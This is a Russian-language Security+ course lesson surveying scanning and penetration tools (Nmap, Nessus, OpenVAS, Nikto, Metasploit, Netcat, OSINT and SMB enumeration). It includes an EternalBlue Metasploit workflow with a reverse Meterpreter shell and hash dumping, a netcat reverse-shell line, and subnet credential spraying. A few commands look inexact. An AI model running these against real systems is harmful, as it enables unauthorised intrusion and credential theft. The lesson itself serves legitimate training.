Распространённые инструменты сканирования: Nessus, OpenVAS, Nmap
Получите практический опыт работы с отраслевыми инструментами для обнаружения узлов, сканирования портов и выявления уязвимостей.
«Распространённые инструменты сканирования: Nessus, OpenVAS, Nmap» — бесплатный урок Security+ Academy на CoddyKit. Это урок 2 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Security+ Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Security+ Academy содержит 4 уроков всего.
Экосистема инструментов сканирования
Специалисты по безопасности используют различные инструменты сканирования для разных целей: обнаружения узлов, сканирования портов, перечисления служб, определения операционной системы, выявления уязвимостей и тестирования веб-приложений. Для экзамена Security+ необходимо знать наиболее широко используемые инструменты каждой категории. Понимание того, что умеет каждый инструмент и чего он не умеет, помогает выбрать подходящий инструмент для конкретной задачи и правильно интерпретировать результаты. Результаты нескольких взаимодополняющих инструментов обеспечивают более полный охват, чем любой отдельный инструмент.
Nmap: сетевой картограф
Nmap (Network Mapper) — наиболее широко используемый инструмент с открытым исходным кодом для обнаружения сетевых узлов и аудита безопасности. Он может обнаруживать активные узлы, перечислять открытые порты, определять работающие службы и их версии, а также операционную систему. Nmap использует различные методы сканирования, включая SYN scan (метод по умолчанию, быстрый и относительно скрытный), TCP Connect (полное рукопожатие, более заметный метод, но не требующий прав root), UDP scan и version scan. В комплект поставки входит Nmap Scripting Engine (NSE), предоставляющий сотни сценариев для обнаружения уязвимостей, перебора паролей и эксплуатации.
# Common Nmap scan types:
nmap -sS 192.168.1.0/24 # SYN scan (fast, stealthy)
nmap -sT 192.168.1.10 # TCP connect scan
nmap -sU -p 53,67,161 target # UDP scan specific ports
nmap -sV 192.168.1.10 # version detection
nmap -O 192.168.1.10 # OS detection
nmap -A 192.168.1.10 # aggressive: -sV -O -sC --traceroute
nmap -p- 192.168.1.10 # scan all 65535 ports
nmap --script vuln 192.168.1.10 # run vulnerability scriptsВывод Nmap и его интерпретация
Правильная интерпретация вывода Nmap — важнейший навык. Каждая строка представляет порт с его состоянием (open: служба прослушивает порт; closed: узел ответил, но ни одна служба не прослушивает порт; filtered: ответа нет или узел недостижим по ICMP, вероятно, из-за межсетевого экрана), протоколом и обнаруженной службой/версией. Открытые порты представляют потенциальную поверхность атаки. Неожиданно открытые порты на узле могут указывать на компрометацию или несанкционированные службы. Флаги -oN, -oX и -oG сохраняют вывод в обычном формате, формате XML и формате, пригодном для обработки grep, соответственно. Сохранение вывода крайне важно для документирования и сравнения результатов сканирования во времени.
# Sample Nmap output:
# PORT STATE SERVICE VERSION
# 22/tcp open ssh OpenSSH 8.2p1 Ubuntu
# 80/tcp open http Apache 2.4.41
# 443/tcp open ssl/http Apache 2.4.41
# 8080/tcp open http Jetty 9.4.39
# 3306/tcp open mysql MySQL 8.0.26
# 3306 open to internet = HIGH RISK (should be internal only)
# Save output:
nmap -sV 192.168.1.0/24 -oN scan_results.txt -oX scan_results.xmlNessus: корпоративный сканер уязвимостей
Nessus (от Tenable) — наиболее широко используемый коммерческий сканер уязвимостей. Он использует архитектуру с подключаемыми модулями и более чем 100 000 Plugins, охватывающими CVE, проверки конфигурации, эталонные требования соответствия (CIS, DISA STIG) и обнаружение вредоносных программ. Nessus выполняет сканирование с учётными данными, входя в системы с предоставленными учётными данными для проверки установленных версий программ, ключей реестра и конфигурационных файлов, что обеспечивает гораздо более точные результаты, чем сетевое зондирование без учётных данных. Nessus создаёт подробные отчёты с оценками CVSS, описаниями уязвимостей и рекомендациями по устранению. Бесплатная версия Nessus Essentials сканирует до 16 IPs.
# Nessus scan configuration key settings:
# Scan type: Advanced Scan (most control)
# Credentials: Windows (domain admin), SSH (root or sudo)
# Plugins: enable 'Safe Checks' to avoid crashing systems
# Schedule: define scan window (off-hours recommended)
# Nessus output rating:
# Critical (CVSS 9.0-10.0): remote code execution, critical data exposure
# High (CVSS 7.0-8.9): privilege escalation, severe data exposure
# Medium (CVSS 4.0-6.9): local privilege escalation, information disclosure
# Low (CVSS 0.1-3.9): minimal impact, hardening issues
# Info: configuration data, no immediate riskOpenVAS: сканирование уязвимостей с открытым исходным кодом
OpenVAS (Open Vulnerability Assessment System) — бесплатный сканер уязвимостей с открытым исходным кодом, поддерживаемый Greenbone Networks. Это поддерживаемая сообществом ответвлённая версия оригинального Nessus, созданная до того, как он стал коммерческим продуктом. OpenVAS использует NVTs (Network Vulnerability Tests), аналогичные Plugins Nessus. Greenbone Community Edition (GCE) предоставляет веб-интерфейс управления (Greenbone Security Assistant). OpenVAS популярен в средах, где стоимость лицензий не позволяет использовать коммерческие инструменты. Он обладает более широким набором функций, чем Nmap, и при этом остаётся бесплатным, поэтому часто выбирается небольшими организациями, академическими учреждениями и лабораториями безопасности.
# OpenVAS quick start:
# Install via Kali Linux or Docker:
gvm-setup # initial setup (takes time to download feeds)
gvm-start # start OpenVAS services
# Create a scan in the web UI (https://localhost:9392):
# 1. Create Target (host IPs, credentials)
# 2. Create Scan Config (Full and Fast, or Full Deep)
# 3. Create Task -> assign target + config
# 4. Start Task -> review Results report
# CLI scan:
openvas-cli --host=127.0.0.1 --user=admin --xml="<start_task>..."Nikto: сканер уязвимостей веб-серверов
Nikto — сканер веб-серверов с открытым исходным кодом, который проверяет наличие опасных файлов, устаревших версий программ, проблем конфигурации сервера и распространённых веб-уязвимостей. Он проверяет более 6 700 известных проблем, включая небезопасные методы HTTP, отсутствующие заголовки безопасности, доступные извне интерфейсы администрирования, учётные данные по умолчанию и распространённые уязвимости CGI. Nikto работает заметно и не предназначен для скрытного использования: он создаёт значительный объём записей журналирования на цели. Он дополняет сканеры сетевого уровня проверками, специфичными для веб-среды, которые Nessus и OpenVAS могут не охватывать подробно. Всегда используйте Nikto только в системах, на тестирование которых у Вас есть разрешение.
# Nikto web scan examples:
nikto -h 192.168.1.10 # basic scan
nikto -h https://192.168.1.10 # HTTPS target
nikto -h 192.168.1.10 -p 8080,8443 # multiple ports
nikto -h 192.168.1.10 -o report.html -Format html # save report
# Nikto checks include:
# - Missing X-Frame-Options, Content-Security-Policy headers
# - Apache/nginx version disclosure
# - /admin, /phpinfo.php, /.git/ exposed
# - Default test files (phpMyAdmin, WebDAV)Metasploit Framework
Metasploit Framework — наиболее широко используемая платформа для тестирования на проникновение, предоставляющая базу данных эксплойтов, полезных нагрузок, вспомогательных модулей и инструментов постэксплуатации. Кандидаты на Security+ должны понимать, что такое Metasploit и какое место он занимает в пен-тестировании, даже если никогда его не использовали. Модули Metasploit включают: эксплойты (код, использующий уязвимость), полезные нагрузки (шелл-код, запускаемый после успешной эксплуатации, например Meterpreter), вспомогательные модули (сканирование, фаззинг и перечисление без эксплуатации) и модули постэксплуатации (для повышения привилегий, извлечения учётных данных и горизонтального перемещения после первоначального доступа).
# Metasploit Framework basic workflow:
msfconsole # start Metasploit
search eternalblue # search for exploit
use exploit/windows/smb/ms17_010_eternalblue
info # show exploit details
set RHOSTS 192.168.1.10 # target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5 # attacker IP
run # execute exploit
# After shell:
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump # dump NTLM hashesNetcat: швейцарский армейский нож
Netcat (nc) — простая, но универсальная утилита, которая считывает и записывает данные через сетевые соединения с использованием TCP или UDP. В работе по Security у неё бесчисленное множество применений: установление обратных оболочек на скомпрометированных узлах, передача файлов между сегментами сети, сканирование портов, создание простых сетевых слушателей для тестирования и получение Banner для определения версий служб. Простота Netcat и его наличие почти в каждой системе Linux сделали его часто используемым инструментом как в легитимном администрировании, так и в наборах инструментов Attacker, поэтому с точки зрения обнаружения также важно понимать принцип его работы.
# Netcat usage examples:
# Banner grabbing:
nc -v 192.168.1.10 22 # grab SSH banner
nc -v 192.168.1.10 80 # grab HTTP banner
# Port scan:
nc -zv 192.168.1.10 1-1024 2>&1 | grep succeeded
# Reverse shell (attacker listens, victim connects out):
# Attacker: nc -lvnp 4444
# Victim: nc attacker_ip 4444 -e /bin/bash
# File transfer:
# Receiver: nc -lvnp 9999 > received_file.txt
# Sender: nc receiver_ip 9999 < file.txtИнструменты Recon-ng и OSINT
Recon-ng — это фреймворк веб-разведки, предназначенный для сбора OSINT (разведывательной информации из открытых источников). Он использует модули, которые обращаются к общедоступным источникам — Shodan, Bing, HaveIBeenPwned, записям DNS, LinkedIn, WHOIS и журналам прозрачности сертификатов, — чтобы собрать сведения о цели до начала любого активного сканирования. Этап разведки при проведении Penetration обычно начинается с OSINT, чтобы составить представление о топологии сети цели, именах сотрудников, форматах адресов электронной почты, используемых технологиях и общедоступных активах. Качественный OSINT может выявить пути атаки, на поиск которых с помощью одного лишь активного сканирования потребовалось бы значительно больше времени.
# OSINT tool chain for reconnaissance:
# 1. WHOIS: domain registration details
whois example.com
# 2. DNS enumeration:
dnsrecon -d example.com -t std
fiercer --domain example.com
# 3. Shodan: internet-facing device search
# shodan search 'org:"Target Corp" port:3389'
# 4. theHarvester: emails, subdomains, names
theharvester -d example.com -l 500 -b google,linkedin
# 5. Certificate transparency:
crt.sh/?q=%.example.com (reveals subdomains via certs)Перечисление сети с помощью Enum4linux
Enum4linux извлекает сведения с узлов Windows и серверов Samba (Linux SMB), используя нулевые сеансы и MSRPC. Он получает имена пользователей, членство в группах, общие ресурсы, политики паролей и сведения о рабочих группах. Во время внутренних Penetration enum4linux может быстро показать учетные записи пользователей, доступные для распыления паролей, и структуру общих ресурсов в среде. Современные версии Windows по умолчанию ограничивают доступ через нулевые сеансы, однако неправильно настроенные среды часто раскрывают значительный объём информации. Аналогичные возможности доступны в Impacket с помощью samrdump.py и в CrackMapExec для аутентифицированного перечисления.
# Enum4linux Windows enumeration:
enum4linux -a 192.168.1.10 # all enumeration
enum4linux -U 192.168.1.10 # users only
enum4linux -S 192.168.1.10 # shares only
# CrackMapExec (authenticated enumeration):
crackmapexec smb 192.168.1.0/24 -u admin -p Password1
crackmapexec smb 192.168.1.10 --users
crackmapexec smb 192.168.1.10 --shares
# Nmap SMB scripts:
nmap --script smb-enum-users 192.168.1.10
nmap --script smb-os-discovery 192.168.1.10Выбор подходящего инструмента для задачи
Специалисты по Security подбирают инструменты под конкретные задачи. Для обнаружения узлов и сканирования портов: Nmap. Для масштабного выявления уязвимостей: Nessus (коммерческий) или OpenVAS (бесплатный). Для уязвимостей веб-серверов: Nikto. Для атак на веб-приложения: Burp Suite. Для Exploitation: Metasploit. Для разведки OSINT: Recon-ng, theHarvester, Shodan. Для анализа сетевого трафика: Wireshark, tcpdump. Для атак на беспроводные сети: пакет Aircrack-ng. На экзамене Security+ проверяются концептуальные знания об этих инструментах — Вам следует знать назначение каждого из них, даже если у Вас нет практического опыта работы с каждым инструментом.
Быстрая проверка
Проверьте своё понимание концепций CompTIA Security+ (SY0-701) из этого урока.
Итоги урока
В этом уроке Вы узнали, что Nmap служит основой для обнаружения узлов, сканирования портов и определения версий, а его мощный механизм сценариев позволяет расширять возможности; Nessus и OpenVAS выполняют комплексное сканирование уязвимостей, связанных с известными CVEs, используя доступ по учетным данным для максимальной точности; а Metasploit предоставляет фреймворк для Exploitation, с помощью которого специалисты по Penetration могут подтвердить фактическую эксплуатацию уязвимостей и продемонстрировать реальное воздействие атаки. Далее мы рассмотрим полный жизненный цикл Penetration — от Reconnaissance до Reporting.
Часто задаваемые вопросы
Урок «Распространённые инструменты сканирования: Nessus, OpenVAS, Nmap» бесплатный?
Да — полный текст урока «Распространённые инструменты сканирования: Nessus, OpenVAS, Nmap» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Security+ Academy, подпишись на CoddyKit PRO. Курс Security+ Academy содержит 4 уроков всего.
Чему я научусь в уроке «Распространённые инструменты сканирования: Nessus, OpenVAS, Nmap»?
Получите практический опыт работы с отраслевыми инструментами для обнаружения узлов, сканирования портов и выявления уязвимостей. Ты практикуешь Security+ Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Security+ Academy?
Предыдущий опыт не требуется. Security+ Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 2 из 4.
Сколько времени занимает урок «Распространённые инструменты сканирования: Nessus, OpenVAS, Nmap»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Security+ Academy?
Да. Каждый урок Security+ Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Сканирование уязвимостей и тестирование на проникновение
- Распространённые инструменты сканирования: Nessus, OpenVAS, Nmap
- Этапы тестирования на проникновение: от разведки до отчёта
- Оценка CVSS и приоритизация уязвимостей